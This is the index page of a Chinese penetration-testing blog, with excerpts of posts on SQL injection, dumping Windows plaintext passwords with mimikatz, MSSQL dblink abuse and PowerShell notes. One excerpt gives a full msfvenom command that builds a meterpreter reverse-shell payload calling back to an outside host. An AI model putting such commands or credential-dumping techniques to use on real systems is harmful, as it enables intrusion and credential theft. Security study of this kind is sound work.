一个博客 一个博客
Hidu

Hidu

  • 累计撰写 42 篇文章
  • 累计创建 11 个分类
  • 累计收到 0 条评论

这是一次SQL注入后感

  • 2024-05-11 21:26
  • 91
  • 0
  • 0
  • 33.1℃
中级安全 
介绍 偶尔会遇到一些注入,已经能确认存在注入,但是使用sqlmap却无法跑出来的情况,然后今日被某站扩展了思路。 某个登录位置存在注入,由于不知道账号,使用万能密码无法登录(后面测试了账号正确情况下万能密码能够登录),但是使用and以及or语句已经确定存在了注入,当时知道sqlmap跑不出来的情况下

Windows获取明文密码的常见方式

  • 2024-05-11 21:25
  • 1097
  • 0
  • 0
  • 133.7℃
初级安全 
Windows获取明文密码 目前网络上已经有许多获取Windows系统明文密码的方式了,且都比较成熟,所以我这里写的和那些相比就属于小巫见大巫了。 这里主要将抓取明文密码,抓Hash方法也适用,包含但不限于下述这些方法。 直接使用mimikatz 第一种比较常见的就是直接使用mimikatz抓取目标

mssql数据库之dblink

  • 2024-05-11 21:22
  • 16
  • 0
  • 0
  • 25.6℃
中级安全 
MSSQL数据库之DBLINK DBLINK,翻译为中文是**数据库链接**,如同字面意思一样,就是数据库本身链接了其他的数据库,又名链接服务器,而这一配置,在MSSQL数据库中比较常见,且如果目标配置了DBLINK,则更加的有利于我们的工作。 实际工作中,可能遇到以下的利用情况: 通过SQL注入,

PowerShell一些笔记

  • 2024-05-11 21:20
  • 22
  • 0
  • 0
  • 26.2℃
初级安全 
Powershell使用 msf生成后门: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=8080 --arch x64 --platform windows -f psh-reflection -o test

Windows一些笔记

  • 2024-05-11 21:17
  • 98
  • 0
  • 0
  • 33.8℃
初级安全 
Windows笔记本 一些基本命令使用 bat中按行读取文件内容: @echo off for /f "delims=" %%i in (test.txt) do ( echo %%i ) pause # 一行 for /f "delims=" %i in (1.txt) do echo